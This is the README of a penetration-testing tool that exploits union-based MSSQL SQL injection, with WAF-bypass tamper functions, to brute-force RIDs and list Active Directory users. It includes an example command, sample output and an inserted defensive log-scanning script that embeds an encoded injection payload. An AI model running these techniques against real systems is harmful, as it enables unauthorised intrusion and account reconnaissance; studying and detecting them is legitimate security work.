MSSQLi-DUET : MSSQL Injection-based Domain User Enumeration Tool

SQL injection script for MSSQL that extracts domain users from an Active Directory environment based on RID bruteforcing. Supports various forms of WAF bypass techniques through the implementation of SQLmap tamper functions. Additional tamper functions can be incorporated by the user depending on the situation and environment.

Comes in two flavors: straight-up Python script for terminal use, or a Burp Suite plugin for simple GUI navigation.

Currently only supports union-based injection. More samples and test cases are required to fully test the tool's functionality and accuracy. Feedback and comments are greatly welcomed if you encounter a situation in which it does not work.

Custom tailoring the script and plugin to your needs should not be too difficult either. Be sure to read the Notes section for some troubleshooting.

Burp Suite Plugin

After loading the plugin into Burp Suite, right-click on a request and send it to MSSQLi-DUET. More details on the parameters and such are described below.

The request will populate in the request window, and only the fields above it need to be filled out. After hitting Run, the output will be placed in the results output box for easy copy-pasting.

Python Script Usage

Script Help

python3 mssqli-duet.py -h

Usage: mssqli-duet.py [-h] -i INJECTION [-e ENCODING] -t TIME_DELAY -rid RID_RANGE
                      [-ssl SSL] -p PARAMETER [-proxy PROXY] [-o OUTFILE] -r REQUEST_FILE

MSSQLi-DUET - MSSQL (Injection-based) Domain User Enumeration Tool

Optional Arguments:
  -h, --help                                    show this help message and exit
  -i INJECTION, --injection INJECTION           Injection point. Provide only the data needed to escape the query.
  -e ENCODING, --encoding ENCODING              Type of encoding: unicode, doubleencode, unmagicquotes
  -t TIME_DELAY, --time_delay TIME_DELAY        Time delay for requests.
  -rid RID_RANGE, --rid_range RID_RANGE         Hypenated range of RIDs to bruteforce. Ex: 1000-1200
  -ssl SSL, --ssl SSL                           Add flag for HTTPS
  -p PARAMETER, --parameter PARAMETER           Vulnerable parameter
  -proxy PROXY, --proxy PROXY                   Proxy connection string. Ex: 127.0.0.1:8080
  -o OUTFILE, --outfile OUTFILE                 Outfile for username enumeration results.
  -r REQUEST_FILE, --request_file REQUEST_FILE  Raw request file saved from Burp

Prepare to be enumerated!

How to use?

After identifying a union-based SQL injection in an application, copy the raw request from Burp Suite using the ‘copy to file’ feature.

Pass the saved request to DUET with the -r flag. Specify the vulnerable parameter as well as the point of injection. As an example, if the parameter "element" is susceptible to SQL injection, -p will be "element". DUET will build out all the SQL injection queries automatically, but the initial injection must be specified: if the injection occurs because of a single apostrophe after the parameter data, that apostrophe is what would be given as the -i argument.

Ex: test'
test'))
test")"


Example

python3 mssqli-duet.py -i "carbon'" -t 0 -rid 1000-1200 -p element -r testrequest.req -proxy 127.0.0.1:8080

Collected request data:
Target URL = http://192.168.11.22/search2.php?element=carbon
Method = GET
Content-Type = applcation/x-www-form-urlencoded

[+]Determining the number of columns in the table…
[!]Number of columns is 3
[+]Determining column type…
[!]Column type is null
[+]Discovering domain name…
[!]Domain = NEUTRINO
[+]Discovering domain SID…
S-1-5-21-4142252318-1896537706-4233180933-
[+]Enumerating Active Directory via SIDs…

NEUTRINO\HYDROGENDC01$
NEUTRINO\DnsAdmins
NEUTRINO\DnsUpdateProxy
NEUTRINO\HELIUM$
NEUTRINO\BORON$
NEUTRINO\BERYLLIUM$
NEUTRINO\aeinstein
NEUTRINO\bbobberson
NEUTRINO\csagan
NEUTRINO\ccheese
NEUTRINO\svc_web
NEUTRINO\svc_sql
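Seen from the web server, a run like the one above is a single client making one request per RID against the same domain SID, which is a clean detection signature. The following is an added example, not part of the tool: it scans constructed access-log lines for SUSER_SNAME probes over a domain SID (the resolution pattern RID-enumeration tooling for MSSQL typically relies on; the page does not print DUET's own payloads, so that is an assumption) and flags any client that sweeps several RIDs of one SID.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed web-server access-log sample (not from the page): one benign
# request, then a client sweeping RIDs 1000-1003 of the domain SID shown above
# through a union-based injection in the "element" parameter.
DOMAIN_SID = "S-1-5-21-4142252318-1896537706-4233180933"
SAMPLE_LOG = "\n".join(
    ['10.0.0.5 - - [12/May/2024:10:00:01 +0000] "GET /search2.php?element=carbon HTTP/1.1" 200 512']
    + [
        f'10.0.0.9 - - [12/May/2024:10:00:0{i} +0000] "GET /search2.php?element=carbon%27+union+select+'
        f'null%2Cnull%2CSUSER_SNAME%28SID_BINARY%28N%27{DOMAIN_SID}-{rid}%27%29%29-- HTTP/1.1" 200 640'
        for i, rid in enumerate(range(1000, 1004), start=2)
    ]
)

# A probe asks the server to resolve one SID whose trailing sub-authority is the RID.
LOG_LINE = re.compile(r'^(\S+) .*? "(?:GET|POST) (\S+)')
RID_PROBE = re.compile(r"SUSER_SNAME\s*\(.*?(S-1-5-21-\d+-\d+-\d+)-(\d+)", re.IGNORECASE)


def extract_probes(log_text):
    """Map client IP -> domain SID -> sorted list of RIDs that client tried to resolve."""
    probes = defaultdict(lambda: defaultdict(set))
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        # Decode percent-encoding and '+' so the injected SQL is matched in clear text.
        hit = RID_PROBE.search(unquote_plus(target))
        if hit:
            probes[ip][hit.group(1)].add(int(hit.group(2)))
    return {ip: {sid: sorted(rids) for sid, rids in sids.items()} for ip, sids in probes.items()}


def detect_rid_sweeps(log_text, min_rids=3):
    """Return (ip, domain_sid, first_rid, last_rid) for each client that probed at
    least min_rids distinct RIDs of the same domain SID, i.e. the behaviour of a
    -rid 1000-1200 style range, which a legitimate search parameter never produces."""
    alerts = []
    for ip, sids in extract_probes(log_text).items():
        for sid, rids in sids.items():
            if len(rids) >= min_rids:
                alerts.append((ip, sid, rids[0], rids[-1]))
    return alerts


if __name__ == "__main__":
    for alert in detect_rid_sweeps(SAMPLE_LOG):
        print("RID sweep from %s against %s: RIDs %d-%d" % alert)
```

Lowering the time delay (-t 0) compresses the sweep into seconds, so keying the rule on distinct RIDs per client rather than on request rate keeps it effective against slow runs as well.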

Notes

The script may need to be modified depending on the casting and type limitations of the columns that are discovered. This includes switching the column position of the payload, and also modifying the query strings themselves to account for column types that will not generate errors.

Additionally, the logic for determining the number of columns is currently not the greatest, and certain comparisons may need to be commented out to ensure proper determination takes place.

Overall, just take a look at the requests being sent in Burp and tailor the script as necessary to the SQL injection environment you find yourself in.

R K
